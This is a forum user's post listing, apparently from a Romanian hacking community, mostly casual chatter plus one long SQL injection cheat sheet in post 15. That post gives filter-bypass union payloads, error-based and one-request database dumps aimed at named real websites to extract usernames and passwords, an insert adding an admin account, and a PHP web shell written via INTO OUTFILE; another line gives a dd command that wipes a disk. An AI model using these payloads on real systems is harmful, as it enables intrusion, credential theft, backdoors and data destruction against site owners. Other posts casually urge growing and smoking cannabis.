Jump to content

EterNo

Active Members
 View Profile  See their activity

  • Posts

    231

  • Joined

  • Last visited

 Content Type 

Everything posted by EterNo

  1. EterNo
    Recomand:
  2. EterNo
    https://www.facebook.com/photo.php?v=602914809785306&set=vb.132866786790113&type=2
  3. EterNo
    La SNG-uri hyper turbo prinzi cel mai mult pesti care se baga de fiecare data all-in cu un As in mana
  4. EterNo
    PokerStars EU Play Free Online Poker Games. Cu o mica investitie si cu multa rabdare si un bankroll managment ok te scoti cat de cat la inceput
  5. EterNo
    Da-mi pm si mie daca vrei.
  6. EterNo
    http://www.youtube.com/watch?v=7iFlR2eMaKU
  7. EterNo
    Planteaza si fumeaza iarba.O sa-ti treaca
  8. EterNo
    Deja dupa nick trebuia sa-ti dai seama cu cine faci tranzactii...
  9. EterNo
    Nici 10 post-uri nu ai, si cine crezi ca ti-ar da root de scan moca?
  10. EterNo
    poate omu vrea un generator cu magneti mic cat pentru 12V si poate mai vrea si un transformator in 220
  11. EterNo
    Ba.. voi sunteti niste frustrati care primiti de proba de la dealeri, va fumati si dupa o dati in suferinta pe forum-uri ca sa fiti voi smecheri sau asa aveti impresia.. Fumati in plm o sativa buna pe timp de zi intre prietenii si n-aveti nici pe dracu dupa cateva ore, va vedeti de treaba si gata.Nu tre sa stie tot prostu' cum o ardeti voi.
  12. EterNo
    Am 2 colete de 150e fiecare de 4-5 luni in vama, mam si plictisit sa ii tot sun si sa le trimit fotocopii, fax-uri si cacaturi ca cica eu sunt minor si nu au cum sa imi genereze factura pe numele meu.Infine la urma urmei ma pis pe ele sau le retrag la 18, in rest.. daca cumperi prin curier, in mai putin de o saptamana le ai acasa.. cel putin in cazul meu(ITALIA) si taxele te costa in jur de 30E dintre care 10 online pentru curier. si vreo 20 cand primesti pachetu. PS: recomand tinydeal.com
  13. EterNo
    //edit, nu mai am nevoie.
  14. EterNo
    Ai uitat ma prapuleian cand te pupai cu ei in cur pentru grade si cacaturi?
  15. EterNo
    String Injection method --'- : +--+ / : -- - : --+- : /* ) order by 1-- - ') order by 1-- - ')order by 1%23%23 %')order by 1%23%23 Null' order by 100--+ Null' order by 9999--+ ')group by 99-- - 'group by 119449-- - 'group/**/by/**/99%23%23 union select ByPassing method +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+ +/*!u%6eion*/+/*!se%6cect*/+ /**/uniUNIONon/**/aALLll/**/selSELECTect/**/ 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23 /*!50000%55nIoN*/+/*!50000%53eLeCt*/ union /*!50000%53elect*/ %55nion %53elect +--+Union+--+Select+--+ +UnIoN/*&a=*/SeLeCT/*&a=*/ id=1+’UnI”On’+'SeL”ECT’ <-MySQL only id=1+'UnI'||'on'+SeLeCT' <-MSSQL only UnIoN SeLeCt CoNcAt(version())-- uNiOn aLl sElEcT uUNIONnion all sSELECTelect =================================================================================================================================== :: Buffer Overflow :: =================================================================================================================================== +And(select 1)=(select 0×414)+union+select+1– +And(select 1)=(select 0xAAAA)+union+select+1– +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+ +and (/*!select*/ 1)=(/*!select*/ 0xAA)+ ================================================================================================================================== :: 400 Bad Request :: ================================================================================================================================== –+%0A union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A – ================================================================================================================================== null the parameter ================================================================================================================================== id=-1 id=null id=1+and+false+ id=9999 id=1 and 0 id==1 id=(-1) ======================================================================================================================================= Group_Concat ======================================================================================================================================= Group_Concat group_concat() /*!group_concat*/() grOUp_ConCat(/*!*/,0x3e,/*!*/) group_concat(,0x3c62723e) g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29 CoNcAt() CONCAT(DISTINCT Version()) concat(,0x3a,) concat%00() %00CoNcAt() /*!50000cOnCat*/(/*!Version()*/) /*!50000cOnCat*/ /**//*!12345cOnCat*/(,0x3a,) concat_ws() concat(0x3a,,0x3c62723e) /*!concat_ws(0x3a,)*/ concat_ws(0x3a3a3a,version() CONCAT_WS(CHAR(32,58,32),version(),) REVERSE(tacnoc) binary(version()) uncompress(compress(version())) aes_decrypt(aes_encrypt(version(),1),1) ==================================================================================================================================== To appear column numbr in page put after id ==================================================================================================================================== id=1+and+1=0+union+select+1,2,3,4,5,6 +AND+1=0 /*!aND*/ 1 like 0 +/*!and*/+1=0 +and+2>3+ +and(1)=(0) and (1)!=(0) +div+0 Having+1=0 =================================================================================================================================== function ByPassing =================================================================================================================================== unhex(hex(value)) cast(value as char) uncompress(compress(version())) cast(version() as char) aes_decrypt(aes_encrypt(version(),1),1) binary(version()) convert(value using ascii) =================================================================================================================================== avoid source page injection =================================================================================================================================== concat(?”>,<br><br><br>,@@version,?<img src=”,?<?’#) “><br>? <img src=” <img src=””/>injection<img src=” concat(0x223e,@@version) concat(0x273e27,version(),0x3c212d2d) concat(0x223e3c62723e,version(),0x3c696d67207372633d22) concat(0x223e,@@version,0x3c696d67207372633d22) concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e) concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22) concat(‘</title>’,@@version,’<title>’) concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27) concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27) =================================================================================================================================== get version – DB_NAME – user – HOST_NAME – datadir =================================================================================================================================== version() convert(version() using latin1) unhex(hex(version())) @@GLOBAL.VERSION (substr(@@version,1,1)=5) :: 1 true 0 fals # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 – ================================================================================================================================== +and substring(version(),1,1)=4 +and substring(version(),1,1)=5 +and substring(version(),1,1)=9 +and substring(version(),1,1)=10 id=1 /*!50094aaaa*/ error id=1 /*!50095aaaa*/ no error id=1 /*!50096aaaa*/ error # like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/ id=1 /*!40123 1=1*/–+- no error id=1 /*!40122rrrr*/ no error # like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4 ================================================================================================================================= DB_NAME() ================================================================================================================================= @@database database() id=vv() # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 – http://www.marinaplast.com/page.php?id=vv() @@user user() user_name() system_user() # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 – HOST_NAME() @@hostname @@servername SERVERPROPERTY() # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 – @@datadir datadir() # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 – ASPX and 1=0/@@version ‘ and 1=0/@@version;– ‘) and 1=@@version– and 1=0/user;– Requested method [DUMP DB in 1 Request] (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x) (select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a) =================================================================================================================================== [DUMP DB in 1 Request improve] =================================================================================================================================== (select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x) like http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 – =================================================================================================================================== #2# =================================================================================================================================== method like DUMP DB in 1 Request =================================================================================================================================== concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))) like http://www.mishnetorah.com/shop/details.php?id=-26+union+select+1,2,3,concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21 =================================================================================================================================== #3# =================================================================================================================================== databases (select+count(schema_name) +from+information_schema.schemata) # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 – tables (select+count(table_name) +from+information_schema.tables) # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 – columns (select+count(column_name) +from+information_schema.columns) # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 – =================================================================================================================================== #4# =================================================================================================================================== show the table with all her columns CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)) +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+ like http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+ =================================================================================================================================== #5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF =================================================================================================================================== feltered requested # tables # group_concat(/*!table_name*/) +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– - /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– - /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– - =================================================================================================================================== # columns # =================================================================================================================================== group_concat(/*!column_name*/) +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table /*!froM*/ table– - =================================================================================================================================== #6# =================================================================================================================================== bypass method (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()) (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table) like http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 – =================================================================================================================================== #7# =================================================================================================================================== bypass method unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))) /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037) like http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)– =================================================================================================================================== [+] Union Select: =================================================================================================================================== union /*!select*/+ union/**/select/**/ /**/union/**/select/**/ /**/union/*!50000select*/ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/uniUNIONon/**/selSELECTect/**/ /**/uniUNIONon/**/aALLll/**/selSELECTect/**/ /**//*!union*//**//*!select*//**/ /**/UNunionION/**/SELselectECT/**/ /**//*UnIOn*//**//*SEleCt*//**/ /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/ /**/UNunionION/**/all/**/SELselectECT/**/ /**//*UnIOn*//**/all/**//*SEleCt*//**/ /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/ uni<on all sel<ect %20union%20/*!select*/%20 union%23aa%0Aselect union+distinct+select+ union+distinctROW+select+ /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+ /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+ /*!u%6eion*/+/*!se%6cect*/+ 1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23 /*!50000%55nIoN*/+/*!50000%53eLeCt*/ union /*!50000%53elect*/ +%2F**/+Union/*!select*/ %55nion %53elect +–+Union+–+Select+–+ +UnIoN/*&a=*/SeLeCT/*&a=*/ uNiOn aLl sElEcT uUNIONnion all sSELECTelect union(select(1),2,3) union (select 1111,2222,3333) union (/*!/**/ SeleCT */ 11) %0A%09UNION%0CSELECT%10NULL% /*!union*//*–*//*!all*//*–*//*!select*/ union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C union+sel%0bect +uni*on+sel*ect+ +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a union(select (1),(2),(3),(4),(5)) UNION(SELECT(column)FROM(table)) id=1+’UnI”On’+’SeL”ECT’ <-MySQL only id=1+’UnI’||’on’+SeLeCT’ <-MSSQL only union select 1–+%0A,2–+%0A,3–+%0A etc …. =================================================================================================================================== [+] Buffer overflow: =================================================================================================================================== +And(select 1)=(select 0×414)+union+select+1– +And(select 1)=(select 0xAAAA)+union+select+1– +and (/*!select*/ 1)=(/*!select*/ 0xAA)+ +and (/*!select*/ 1)=(/*!select*/ 0×414)+ +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141414141414141414?141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 4141)+ =================================================================================================================================== [+] Group Concat: =================================================================================================================================== Group_Concat group_concat() /*!group_concat*/() grOUp_ConCat(/*!*/,0x3e,/*!*/) group_concat(,0x3c62723e) g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29 CoNcAt() CONCAT(DISTINCT Version()) concat(,0x3a,) concat%00() %00CoNcAt() /*!50000cOnCat*/(/*!Version()*/) /*!50000cOnCat*/ /**//*!12345cOnCat*/(,0x3a,) concat_ws() concat(0x3a,,0x3c62723e) /*!concat_ws(0x3a,)*/ concat_ws(0x3a3a3a,version() CONCAT_WS(CHAR(32,58,32),version(),) =================================================================================================================================== ERORE BASED =================================================================================================================================== =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1– Database 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) Table_name and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a) Columns 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) extract date http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) Notice the limit function in the query A website can have more than 2 two databases, so increase the limit until you find all database names Example: limit 0,1 or limit 1,1 or limit 2,1 =================================================================================================================================== Differences: Error Based Query for Database Extraction: =================================================================================================================================== and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) Double Query for Database Extraction: and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1 =================================================================================================================================== WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+ =================================================================================================================================== Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva. Code: dd if=/dev/urandom of=/dev/sda bs=1M I’d say using concat(0xY) Y being ‘<script>alert(‘Text here’);</script>’ in hex union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e) http://zerocoolhf.altervista.org/level2.php?id=-1%27%20union%20select%20*%20from%28%28select%201%29a%20join%20%28select%20version%28%29%29b%20join%20%28select%20database%28%29%29c%29–+ union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’) =113?+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+– injection in sql database addd new user INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'unix_chro@yahoo.com’) +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) CHALLENGES Code: =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0×7365637572697479))–+- =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1– =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security– =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– - =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+- =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# | null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x =================================================================================================================================== Error Based: =================================================================================================================================== +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1– or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150) from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– - or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — - and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))) +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x or 1=convert(int,(@@version))- +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1– +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+- =================================================================================================================================== WAF BYPASS BY TOTTI =================================================================================================================================== =-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())– - =2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()– - =================================================================================================================================== WUBI – 1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4– (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x) (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x) (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x) =================================================================================================================================== +and+1=convert(int,SERVERPROPERTY(‘ProductVersion’)) =================================================================================================================================== http://zerofreak.blogspot.it/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html http://www.websec.ca/kb/sql_injection http://www.hellboundhackers.org/articles/862-mysql-injection-complete-tutorial.html =================================================================================================================================== test http://www.mt.ro/nou/articol.php?id=-angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+ ………………………………….. http://www.mt.ro/nou/articol.php?id=-angajari’ and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+ SELECT “<? system($_REQUEST['cmd']); ?>” INTO OUTFILE “full/path/here/cmd.php” Sursa:neohapsis.altervista.org
  16. EterNo

    Salut

    EterNo replied to r0mulus's topic in Bine ai venit

    plm mea )
  17. EterNo
    asta? Are cineva
  18. EterNo

    Ultra log

    EterNo replied to lamatrice's topic in Programe utile

    Avoja.... tua mamma nn ce la presenti?! @misefalfaie spacco bottiglia ammazzo famiglia )
  19. EterNo
    un documentar sau un serial, film ceva care sa te motiveze in viata in ce vrei sa faci (nu conteaza domeniu), sa-ti sporeasca chefu.. ceva bun dupa o joana?
  20. EterNo
    Sa tot fie ziua copilului, cel putin pentru mine )
  21. EterNo
    Windows 7 home premium x64, luat acu dupa un pc. are vreo 3 luni.. 44BSWH6kkgt1kztEmkH2ZfmN40TeZ14N+In94yHlBxr+7et14466CzDm+ftD4RWH4kHG=eh+1e+X
  22. EterNo

    Fun stuff

    EterNo replied to Wisa's topic in Discutii non-IT

  23. EterNo
    Sursa?
  24. EterNo
    De unde veniti ma? toti cu metode si prostii d-astea de luat $ din donwload-uri, pai daca va merg voua dece sloboz mai cersiti cativa centi acolo pentru download ?
  25. EterNo
×
×
  • Create New...